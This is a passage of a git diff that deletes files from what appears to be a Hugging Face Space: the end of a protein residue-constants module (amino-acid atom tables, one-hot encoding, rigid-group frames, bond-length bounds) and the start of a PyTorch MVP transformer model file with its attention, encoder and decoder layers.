"OE2", "", "", "", "", ""], - "GLY": ["N", "CA", "C", "O", "", "", "", "", "", "", "", "", "", ""], - "HIS": ["N", "CA", "C", "O", "CB", "CG", "ND1", "CD2", "CE1", "NE2", "", "", "", ""], - "ILE": ["N", "CA", "C", "O", "CB", "CG1", "CG2", "CD1", "", "", "", "", "", ""], - "LEU": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "", "", "", "", "", ""], - "LYS": ["N", "CA", "C", "O", "CB", "CG", "CD", "CE", "NZ", "", "", "", "", ""], - "MET": ["N", "CA", "C", "O", "CB", "CG", "SD", "CE", "", "", "", "", "", ""], - "PHE": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "", "", ""], - "PRO": ["N", "CA", "C", "O", "CB", "CG", "CD", "", "", "", "", "", "", ""], - "SER": ["N", "CA", "C", "O", "CB", "OG", "", "", "", "", "", "", "", ""], - "THR": ["N", "CA", "C", "O", "CB", "OG1", "CG2", "", "", "", "", "", "", ""], - "TRP": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "NE1", "CE2", "CE3", "CZ2", "CZ3", "CH2"], - "TYR": ["N", "CA", "C", "O", "CB", "CG", "CD1", "CD2", "CE1", "CE2", "CZ", "OH", "", ""], - "VAL": ["N", "CA", "C", "O", "CB", "CG1", "CG2", "", "", "", "", "", "", ""], - "UNK": ["", "", "", "", "", "", "", "", "", "", "", "", "", ""], -} -# pylint: enable=line-too-long -# pylint: enable=bad-whitespace - - -# This is the standard residue order when coding AA type as a number. -# Reproduce it by taking 3-letter AA codes and sorting them alphabetically. -restypes: List[str] = [ - "A", - "R", - "N", - "D", - "C", - "Q", - "E", - "G", - "H", - "I", - "L", - "K", - "M", - "F", - "P", - "S", - "T", - "W", - "Y", - "V", -] -restype_order: Dict[str, int] = {restype: i for i, restype in enumerate(restypes)} -restype_num = len(restypes) # := 20. -unk_restype_index = restype_num # Catch-all index for unknown restypes. - -restypes_with_x: List[str] = restypes + ["X"] -restype_order_with_x: Dict[str, int] = {restype: i for i, restype in enumerate(restypes_with_x)} - - -def sequence_to_onehot(sequence: str, mapping: Mapping[str, int], map_unknown_to_x: bool = False) -> np.ndarray: - """Maps the given sequence into a one-hot encoded matrix. - - Args: - sequence: An amino acid sequence. - mapping: A dictionary mapping amino acids to integers. - map_unknown_to_x: If True, any amino acid that is not in the mapping will be - mapped to the unknown amino acid 'X'. If the mapping doesn't contain amino acid 'X', an error will be thrown. - If False, any amino acid not in the mapping will throw an error. - - Returns: - A numpy array of shape (seq_len, num_unique_aas) with one-hot encoding of the sequence. - - Raises: - ValueError: If the mapping doesn't contain values from 0 to - num_unique_aas - 1 without any gaps. - """ - num_entries = max(mapping.values()) + 1 - - if sorted(set(mapping.values())) != list(range(num_entries)): - raise ValueError( - "The mapping must have values from 0 to num_unique_aas-1 without any gaps. Got: %s" - % sorted(mapping.values()) - ) - - one_hot_arr = np.zeros((len(sequence), num_entries), dtype=np.int32) - - for aa_index, aa_type in enumerate(sequence): - if map_unknown_to_x: - if aa_type.isalpha() and aa_type.isupper(): - aa_id = mapping.get(aa_type, mapping["X"]) - else: - raise ValueError(f"Invalid character in the sequence: {aa_type}") - else: - aa_id = mapping[aa_type] - one_hot_arr[aa_index, aa_id] = 1 - - return one_hot_arr - - -restype_1to3: Dict[str, str] = { - "A": "ALA", - "R": "ARG", - "N": "ASN", - "D": "ASP", - "C": "CYS", - "Q": "GLN", - "E": "GLU", - "G": "GLY", - "H": "HIS", - "I": "ILE", - "L": "LEU", - "K": "LYS", - "M": "MET", - "F": "PHE", - "P": "PRO", - "S": "SER", - "T": "THR", - "W": "TRP", - "Y": "TYR", - "V": "VAL", -} - - -# NB: restype_3to1 differs from Bio.PDB.protein_letters_3to1 by being a simple -# 1-to-1 mapping of 3 letter names to one letter names. The latter contains -# many more, and less common, three letter names as keys and maps many of these -# to the same one letter name (including 'X' and 'U' which we don't use here). -restype_3to1: Dict[str, str] = {v: k for k, v in restype_1to3.items()} - -# Define a restype name for all unknown residues. -unk_restype = "UNK" - -resnames: List[str] = [restype_1to3[r] for r in restypes] + [unk_restype] -resname_to_idx: Dict[str, int] = {resname: i for i, resname in enumerate(resnames)} - - -# The mapping here uses hhblits convention, so that B is mapped to D, J and O -# are mapped to X, U is mapped to C, and Z is mapped to E. Other than that the -# remaining 20 amino acids are kept in alphabetical order. -# There are 2 non-amino acid codes, X (representing any amino acid) and -# "-" representing a missing amino acid in an alignment. The id for these -# codes is put at the end (20 and 21) so that they can easily be ignored if -# desired. -HHBLITS_AA_TO_ID: Dict[str, int] = { - "A": 0, - "B": 2, - "C": 1, - "D": 2, - "E": 3, - "F": 4, - "G": 5, - "H": 6, - "I": 7, - "J": 20, - "K": 8, - "L": 9, - "M": 10, - "N": 11, - "O": 20, - "P": 12, - "Q": 13, - "R": 14, - "S": 15, - "T": 16, - "U": 1, - "V": 17, - "W": 18, - "X": 20, - "Y": 19, - "Z": 3, - "-": 21, -} - -# Partial inversion of HHBLITS_AA_TO_ID. -ID_TO_HHBLITS_AA: Dict[int, str] = { - 0: "A", - 1: "C", # Also U. - 2: "D", # Also B. - 3: "E", # Also Z. - 4: "F", - 5: "G", - 6: "H", - 7: "I", - 8: "K", - 9: "L", - 10: "M", - 11: "N", - 12: "P", - 13: "Q", - 14: "R", - 15: "S", - 16: "T", - 17: "V", - 18: "W", - 19: "Y", - 20: "X", # Includes J and O. - 21: "-", -} - -restypes_with_x_and_gap: List[str] = restypes + ["X", "-"] -MAP_HHBLITS_AATYPE_TO_OUR_AATYPE: Tuple[int, ...] = tuple( - restypes_with_x_and_gap.index(ID_TO_HHBLITS_AA[i]) for i in range(len(restypes_with_x_and_gap)) -) - - -def _make_standard_atom_mask() -> np.ndarray: - """Returns [num_res_types, num_atom_types] mask array.""" - # +1 to account for unknown (all 0s). - mask = np.zeros([restype_num + 1, atom_type_num], dtype=np.int32) - for restype, restype_letter in enumerate(restypes): - restype_name = restype_1to3[restype_letter] - atom_names = residue_atoms[restype_name] - for atom_name in atom_names: - atom_type = atom_order[atom_name] - mask[restype, atom_type] = 1 - return mask - - -STANDARD_ATOM_MASK = _make_standard_atom_mask() - - -# A one hot representation for the first and second atoms defining the axis -# of rotation for each chi-angle in each residue. -def chi_angle_atom(atom_index: int) -> np.ndarray: - """Define chi-angle rigid groups via one-hot representations.""" - chi_angles_index = {} - one_hots = [] - - for k, v in chi_angles_atoms.items(): - indices = [atom_types.index(s[atom_index]) for s in v] - indices.extend([-1] * (4 - len(indices))) - chi_angles_index[k] = indices - - for r in restypes: - res3 = restype_1to3[r] - one_hot = np.eye(atom_type_num)[chi_angles_index[res3]] - one_hots.append(one_hot) - - one_hots.append(np.zeros([4, atom_type_num])) # Add zeros for residue `X`. - one_hot = np.stack(one_hots, axis=0) - one_hot = np.transpose(one_hot, [0, 2, 1]) - - return one_hot - - -chi_atom_1_one_hot = chi_angle_atom(1) -chi_atom_2_one_hot = chi_angle_atom(2) - -# An array like chi_angles_atoms but using indices rather than names. -chi_angles_atom_indices_list: List[List[List[str]]] = [chi_angles_atoms[restype_1to3[r]] for r in restypes] -chi_angles_atom_indices_ours: list = map_structure_with_atom_order(chi_angles_atom_indices_list) -chi_angles_atom_indices = np.array( - [chi_atoms + ([[0, 0, 0, 0]] * (4 - len(chi_atoms))) for chi_atoms in chi_angles_atom_indices_list] -) - -# Mapping from (res_name, atom_name) pairs to the atom's chi group index -# and atom index within that group. -chi_groups_for_atom: Dict[Tuple[str, str], List[Tuple[int, int]]] = collections.defaultdict(list) -for res_name, chi_angle_atoms_for_res in chi_angles_atoms.items(): - for chi_group_i, chi_group in enumerate(chi_angle_atoms_for_res): - for atom_i, atom in enumerate(chi_group): - chi_groups_for_atom[(res_name, atom)].append((chi_group_i, atom_i)) -chi_groups_for_atom = dict(chi_groups_for_atom) - - -def _make_rigid_transformation_4x4(ex: np.ndarray, ey: np.ndarray, translation: np.ndarray) -> np.ndarray: - """Create a rigid 4x4 transformation matrix from two axes and transl.""" - # Normalize ex. - ex_normalized = ex / np.linalg.norm(ex) - - # make ey perpendicular to ex - ey_normalized = ey - np.dot(ey, ex_normalized) * ex_normalized - ey_normalized /= np.linalg.norm(ey_normalized) - - # compute ez as cross product - eznorm = np.cross(ex_normalized, ey_normalized) - m = np.stack([ex_normalized, ey_normalized, eznorm, translation]).transpose() - m = np.concatenate([m, [[0.0, 0.0, 0.0, 1.0]]], axis=0) - return m - - -# create an array with (restype, atomtype) --> rigid_group_idx -# and an array with (restype, atomtype, coord) for the atom positions -# and compute affine transformation matrices (4,4) from one rigid group to the -# previous group -restype_atom37_to_rigid_group = np.zeros([21, 37], dtype=int) -restype_atom37_mask = np.zeros([21, 37], dtype=np.float32) -restype_atom37_rigid_group_positions = np.zeros([21, 37, 3], dtype=np.float32) -restype_atom14_to_rigid_group = np.zeros([21, 14], dtype=int) -restype_atom14_mask = np.zeros([21, 14], dtype=np.float32) -restype_atom14_rigid_group_positions = np.zeros([21, 14, 3], dtype=np.float32) -restype_rigid_group_default_frame = np.zeros([21, 8, 4, 4], dtype=np.float32) - - -def _make_rigid_group_constants() -> None: - """Fill the arrays above.""" - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - for atomname, group_idx, atom_position in rigid_group_atom_positions[resname]: - atomtype = atom_order[atomname] - restype_atom37_to_rigid_group[restype, atomtype] = group_idx - restype_atom37_mask[restype, atomtype] = 1 - restype_atom37_rigid_group_positions[restype, atomtype, :] = atom_position - - atom14idx = restype_name_to_atom14_names[resname].index(atomname) - restype_atom14_to_rigid_group[restype, atom14idx] = group_idx - restype_atom14_mask[restype, atom14idx] = 1 - restype_atom14_rigid_group_positions[restype, atom14idx, :] = atom_position - - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - atom_positions: Dict[str, np.ndarray] = { - name: np.array(pos) for name, _, pos in rigid_group_atom_positions[resname] - } - - # backbone to backbone is the identity transform - restype_rigid_group_default_frame[restype, 0, :, :] = np.eye(4) - - # pre-omega-frame to backbone (currently dummy identity matrix) - restype_rigid_group_default_frame[restype, 1, :, :] = np.eye(4) - - # phi-frame to backbone - mat = _make_rigid_transformation_4x4( - ex=atom_positions["N"] - atom_positions["CA"], - ey=np.array([1.0, 0.0, 0.0]), - translation=atom_positions["N"], - ) - restype_rigid_group_default_frame[restype, 2, :, :] = mat - - # psi-frame to backbone - mat = _make_rigid_transformation_4x4( - ex=atom_positions["C"] - atom_positions["CA"], - ey=atom_positions["CA"] - atom_positions["N"], - translation=atom_positions["C"], - ) - restype_rigid_group_default_frame[restype, 3, :, :] = mat - - # chi1-frame to backbone - if chi_angles_mask[restype][0]: - base_atom_names = chi_angles_atoms[resname][0] - base_atom_positions = [atom_positions[name] for name in base_atom_names] - mat = _make_rigid_transformation_4x4( - ex=base_atom_positions[2] - base_atom_positions[1], - ey=base_atom_positions[0] - base_atom_positions[1], - translation=base_atom_positions[2], - ) - restype_rigid_group_default_frame[restype, 4, :, :] = mat - - # chi2-frame to chi1-frame - # chi3-frame to chi2-frame - # chi4-frame to chi3-frame - # luckily all rotation axes for the next frame start at (0,0,0) of the - # previous frame - for chi_idx in range(1, 4): - if chi_angles_mask[restype][chi_idx]: - axis_end_atom_name = chi_angles_atoms[resname][chi_idx][2] - axis_end_atom_position = atom_positions[axis_end_atom_name] - mat = _make_rigid_transformation_4x4( - ex=axis_end_atom_position, - ey=np.array([-1.0, 0.0, 0.0]), - translation=axis_end_atom_position, - ) - restype_rigid_group_default_frame[restype, 4 + chi_idx, :, :] = mat - - -_make_rigid_group_constants() - - -def make_atom14_dists_bounds( - overlap_tolerance: float = 1.5, - bond_length_tolerance_factor: int = 15, -) -> Dict[str, np.ndarray]: - """compute upper and lower bounds for bonds to assess violations.""" - restype_atom14_bond_lower_bound = np.zeros([21, 14, 14], np.float32) - restype_atom14_bond_upper_bound = np.zeros([21, 14, 14], np.float32) - restype_atom14_bond_stddev = np.zeros([21, 14, 14], np.float32) - residue_bonds, residue_virtual_bonds, _ = load_stereo_chemical_props() - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - atom_list = restype_name_to_atom14_names[resname] - - # create lower and upper bounds for clashes - for atom1_idx, atom1_name in enumerate(atom_list): - if not atom1_name: - continue - atom1_radius = van_der_waals_radius[atom1_name[0]] - for atom2_idx, atom2_name in enumerate(atom_list): - if (not atom2_name) or atom1_idx == atom2_idx: - continue - atom2_radius = van_der_waals_radius[atom2_name[0]] - lower = atom1_radius + atom2_radius - overlap_tolerance - upper = 1e10 - restype_atom14_bond_lower_bound[restype, atom1_idx, atom2_idx] = lower - restype_atom14_bond_lower_bound[restype, atom2_idx, atom1_idx] = lower - restype_atom14_bond_upper_bound[restype, atom1_idx, atom2_idx] = upper - restype_atom14_bond_upper_bound[restype, atom2_idx, atom1_idx] = upper - - # overwrite lower and upper bounds for bonds and angles - for b in residue_bonds[resname] + residue_virtual_bonds[resname]: - atom1_idx = atom_list.index(b.atom1_name) - atom2_idx = atom_list.index(b.atom2_name) - lower = b.length - bond_length_tolerance_factor * b.stddev - upper = b.length + bond_length_tolerance_factor * b.stddev - restype_atom14_bond_lower_bound[restype, atom1_idx, atom2_idx] = lower - restype_atom14_bond_lower_bound[restype, atom2_idx, atom1_idx] = lower - restype_atom14_bond_upper_bound[restype, atom1_idx, atom2_idx] = upper - restype_atom14_bond_upper_bound[restype, atom2_idx, atom1_idx] = upper - restype_atom14_bond_stddev[restype, atom1_idx, atom2_idx] = b.stddev - restype_atom14_bond_stddev[restype, atom2_idx, atom1_idx] = b.stddev - return { - "lower_bound": restype_atom14_bond_lower_bound, # shape (21,14,14) - "upper_bound": restype_atom14_bond_upper_bound, # shape (21,14,14) - "stddev": restype_atom14_bond_stddev, # shape (21,14,14) - } - - -restype_atom14_ambiguous_atoms = np.zeros((21, 14), dtype=np.float32) -restype_atom14_ambiguous_atoms_swap_idx: np.ndarray = np.tile(np.arange(14, dtype=int), (21, 1)) - - -def _make_atom14_ambiguity_feats() -> None: - for res, pairs in residue_atom_renaming_swaps.items(): - res_idx = restype_order[restype_3to1[res]] - for atom1, atom2 in pairs.items(): - atom1_idx = restype_name_to_atom14_names[res].index(atom1) - atom2_idx = restype_name_to_atom14_names[res].index(atom2) - restype_atom14_ambiguous_atoms[res_idx, atom1_idx] = 1 - restype_atom14_ambiguous_atoms[res_idx, atom2_idx] = 1 - restype_atom14_ambiguous_atoms_swap_idx[res_idx, atom1_idx] = atom2_idx - restype_atom14_ambiguous_atoms_swap_idx[res_idx, atom2_idx] = atom1_idx - - -_make_atom14_ambiguity_feats() - - -def aatype_to_str_sequence(aatype: Sequence[int]) -> str: - return "".join([restypes_with_x[aatype[i]] for i in range(len(aatype))]) diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py deleted file mode 100644 index 21a82f95c333838fb648d79e5ef045e39335a411..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py +++ /dev/null @@ -1,2073 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" PyTorch MVP model.""" -import copy -import math -from typing import List, Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss - -from ...activations import ACT2FN -from ...modeling_outputs import ( - BaseModelOutput, - BaseModelOutputWithPastAndCrossAttentions, - CausalLMOutputWithCrossAttentions, - Seq2SeqLMOutput, - Seq2SeqModelOutput, - Seq2SeqQuestionAnsweringModelOutput, - Seq2SeqSequenceClassifierOutput, -) -from ...modeling_utils import PreTrainedModel -from ...utils import ( - add_code_sample_docstrings, - add_end_docstrings, - add_start_docstrings, - add_start_docstrings_to_model_forward, - logging, - replace_return_docstrings, -) -from .configuration_mvp import MvpConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "RUCAIBox/mvp" -_CONFIG_FOR_DOC = "MvpConfig" - -# Base model docstring -_EXPECTED_OUTPUT_SHAPE = [1, 8, 1024] - -MVP_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "RUCAIBox/mvp", - "RUCAIBox/mvp-data-to-text", - "RUCAIBox/mvp-open-dialog", - "RUCAIBox/mvp-question-answering", - "RUCAIBox/mvp-question-generation", - "RUCAIBox/mvp-story", - "RUCAIBox/mvp-summarization", - "RUCAIBox/mvp-task-dialog", - "RUCAIBox/mtl-data-to-text", - "RUCAIBox/mtl-multi-task", - "RUCAIBox/mtl-open-dialog", - "RUCAIBox/mtl-question-answering", - "RUCAIBox/mtl-question-generation", - "RUCAIBox/mtl-story", - "RUCAIBox/mtl-summarization", - # See all MVP models at https://huggingface.co/models?filter=mvp -] - - -# Copied from transformers.models.bart.modeling_bart.shift_tokens_right -def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int): - """ - Shift input ids one token to the right. - """ - shifted_input_ids = input_ids.new_zeros(input_ids.shape) - shifted_input_ids[:, 1:] = input_ids[:, :-1].clone() - shifted_input_ids[:, 0] = decoder_start_token_id - - if pad_token_id is None: - raise ValueError("self.model.config.pad_token_id has to be defined.") - # replace possible -100 values in labels by `pad_token_id` - shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id) - - return shifted_input_ids - - -# Copied from transformers.models.bart.modeling_bart._make_causal_mask -def _make_causal_mask( - input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0 -): - """ - Make causal mask used for bi-directional self-attention. - """ - bsz, tgt_len = input_ids_shape - mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device) - mask_cond = torch.arange(mask.size(-1), device=device) - mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0) - mask = mask.to(dtype) - - if past_key_values_length > 0: - mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1) - return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length) - - -# Copied from transformers.models.bart.modeling_bart._expand_mask -def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None): - """ - Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`. - """ - bsz, src_len = mask.size() - tgt_len = tgt_len if tgt_len is not None else src_len - - expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype) - - inverted_mask = 1.0 - expanded_mask - - return inverted_mask.masked_fill(inverted_mask.to(torch.bool), torch.finfo(dtype).min) - - -# Copied from transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding with Bart->MVP -class MvpLearnedPositionalEmbedding(nn.Embedding): - """ - This module learns positional embeddings up to a fixed maximum size. - """ - - def __init__(self, num_embeddings: int, embedding_dim: int): - # MVP is set up so that if padding_idx is specified then offset the embedding ids by 2 - # and adjust num_embeddings appropriately. Other models don't have this hack - self.offset = 2 - super().__init__(num_embeddings + self.offset, embedding_dim) - - def forward(self, input_ids: torch.Tensor, past_key_values_length: int = 0): - """`input_ids' shape is expected to be [bsz x seqlen].""" - - bsz, seq_len = input_ids.shape[:2] - positions = torch.arange( - past_key_values_length, past_key_values_length + seq_len, dtype=torch.long, device=self.weight.device - ).expand(bsz, -1) - - return super().forward(positions + self.offset) - - -class MvpAttention(nn.Module): - """Multi-headed attention from 'Attention Is All You Need' paper""" - - def __init__( - self, - embed_dim: int, - num_heads: int, - dropout: float = 0.0, - is_decoder: bool = False, - bias: bool = True, - ): - super().__init__() - self.embed_dim = embed_dim - self.num_heads = num_heads - self.dropout = dropout - self.head_dim = embed_dim // num_heads - - if (self.head_dim * num_heads) != self.embed_dim: - raise ValueError( - f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}" - f" and `num_heads`: {num_heads})." - ) - self.scaling = self.head_dim**-0.5 - self.is_decoder = is_decoder - - self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - - def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int): - return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous() - - def forward( - self, - hidden_states: torch.Tensor, - key_value_states: Optional[torch.Tensor] = None, - past_key_value: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.Tensor] = None, - layer_head_mask: Optional[torch.Tensor] = None, - attn_prompt: Optional[torch.Tensor] = None, - output_attentions: bool = False, - ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: - """Input shape: Batch x Time x Channel""" - - # if key_value_states are provided this layer is used as a cross-attention layer - # for the decoder - is_cross_attention = key_value_states is not None - - bsz, tgt_len, _ = hidden_states.size() - - # get query proj - query_states = self.q_proj(hidden_states) * self.scaling - # get key, value proj - if is_cross_attention and past_key_value is not None: - # reuse k,v, cross_attentions - key_states = past_key_value[0] - value_states = past_key_value[1] - elif is_cross_attention: - # cross_attentions - key_states = self._shape(self.k_proj(key_value_states), -1, bsz) - value_states = self._shape(self.v_proj(key_value_states), -1, bsz) - elif past_key_value is not None: - # reuse k, v, self_attention - key_states = self._shape(self.k_proj(hidden_states), -1, bsz) - value_states = self._shape(self.v_proj(hidden_states), -1, bsz) - key_states = torch.cat([past_key_value[0], key_states], dim=2) - value_states = torch.cat([past_key_value[1], value_states], dim=2) - else: - # self_attention - key_states = self._shape(self.k_proj(hidden_states), -1, bsz) - value_states = self._shape(self.v_proj(hidden_states), -1, bsz) - - if self.is_decoder: - # if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states. - # Further calls to cross_attention layer can then reuse all cross-attention - # key/value_states (first "if" case) - # if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of - # all previous decoder key/value_states. Further calls to uni-directional self-attention - # can concat previous decoder key/value_states to current projected key/value_states (third "elif" case) - # if encoder bi-directional self-attention `past_key_value` is always `None` - past_key_value = (key_states, value_states) - - if attn_prompt is not None: - key_states = torch.cat([attn_prompt[0].expand(bsz, -1, -1, -1), key_states], dim=2) - value_states = torch.cat([attn_prompt[1].expand(bsz, -1, -1, -1), value_states], dim=2) - if attention_mask is not None: - prompt_mask = torch.zeros(bsz, 1, tgt_len, attn_prompt[0].size(1)).to(attention_mask.device) - attention_mask = torch.cat([prompt_mask, attention_mask], dim=(-1)) - - proj_shape = (bsz * self.num_heads, -1, self.head_dim) - query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape) - key_states = key_states.view(*proj_shape) - value_states = value_states.view(*proj_shape) - - src_len = key_states.size(1) - attn_weights = torch.bmm(query_states, key_states.transpose(1, 2)) - - if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len): - raise ValueError( - f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is" - f" {attn_weights.size()}" - ) - - if attention_mask is not None: - if attention_mask.size() != (bsz, 1, tgt_len, src_len): - raise ValueError( - f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}" - ) - attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask - attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len) - - attn_weights = nn.functional.softmax(attn_weights, dim=-1) - - if layer_head_mask is not None: - if layer_head_mask.size() != (self.num_heads,): - raise ValueError( - f"Head mask for a single layer should be of size {(self.num_heads,)}, but is" - f" {layer_head_mask.size()}" - ) - attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len) - attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len) - - if output_attentions: - # this operation is a bit awkward, but it's required to - # make sure that attn_weights keeps its gradient. - # In order to do so, attn_weights have to be reshaped - # twice and have to be reused in the following - attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) - attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len) - else: - attn_weights_reshaped = None - - attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training) - - attn_output = torch.bmm(attn_probs, value_states) - - if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim): - raise ValueError( - f"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is" - f" {attn_output.size()}" - ) - - attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim) - attn_output = attn_output.transpose(1, 2) - - # Use the `embed_dim` from the config (stored in the class) rather than `hidden_state` because `attn_output` can be - # partitioned aross GPUs when using tensor-parallelism. - attn_output = attn_output.reshape(bsz, tgt_len, self.embed_dim) - - attn_output = self.out_proj(attn_output) - - return attn_output, attn_weights_reshaped, past_key_value - - -class MvpEncoderLayer(nn.Module): - def __init__(self, config: MvpConfig): - super().__init__() - self.embed_dim = config.d_model - self.self_attn = MvpAttention( - embed_dim=self.embed_dim, - num_heads=config.encoder_attention_heads, - dropout=config.attention_dropout, - ) - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.dropout = config.dropout - self.activation_fn = ACT2FN[config.activation_function] - self.activation_dropout = config.activation_dropout - self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim) - self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim) - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def forward( - self, - hidden_states: torch.FloatTensor, - attention_mask: torch.FloatTensor, - layer_head_mask: torch.FloatTensor, - self_attn_prompt: torch.FloatTensor, - output_attentions: Optional[bool] = False, - ) -> Tuple[torch.FloatTensor, Optional[torch.FloatTensor]]: - """ - Args: - hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size - `(encoder_attention_heads,)`. - self_attn_prompt (`torch.FloatTensor`): prompt of self attention of shape - `(2, encoder_attention_heads, pro_len, head_dim)`. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - """ - residual = hidden_states - hidden_states, attn_weights, _ = self.self_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - layer_head_mask=layer_head_mask, - attn_prompt=self_attn_prompt, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.self_attn_layer_norm(hidden_states) - - residual = hidden_states - hidden_states = self.activation_fn(self.fc1(hidden_states)) - hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training) - hidden_states = self.fc2(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.final_layer_norm(hidden_states) - - if hidden_states.dtype == torch.float16 and ( - torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any() - ): - clamp_value = torch.finfo(hidden_states.dtype).max - 1000 - hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value) - - outputs = (hidden_states,) - - if output_attentions: - outputs += (attn_weights,) - - return outputs - - -class MvpDecoderLayer(nn.Module): - def __init__(self, config: MvpConfig): - super().__init__() - self.embed_dim = config.d_model - - self.self_attn = MvpAttention( - embed_dim=self.embed_dim, - num_heads=config.decoder_attention_heads, - dropout=config.attention_dropout, - is_decoder=True, - ) - self.dropout = config.dropout - self.activation_fn = ACT2FN[config.activation_function] - self.activation_dropout = config.activation_dropout - - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.encoder_attn = MvpAttention( - self.embed_dim, - config.decoder_attention_heads, - dropout=config.attention_dropout, - is_decoder=True, - ) - self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim) - self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim) - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def forward( - self, - hidden_states: torch.Tensor, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.Tensor] = None, - encoder_attention_mask: Optional[torch.Tensor] = None, - layer_head_mask: Optional[torch.Tensor] = None, - cross_attn_layer_head_mask: Optional[torch.Tensor] = None, - self_attn_prompt: Optional[torch.Tensor] = None, - cross_attn_prompt: Optional[torch.Tensor] = None, - past_key_value: Optional[Tuple[torch.Tensor]] = None, - output_attentions: Optional[bool] = False, - use_cache: Optional[bool] = True, - ) -> Tuple[torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]]: - """ - Args: - hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - 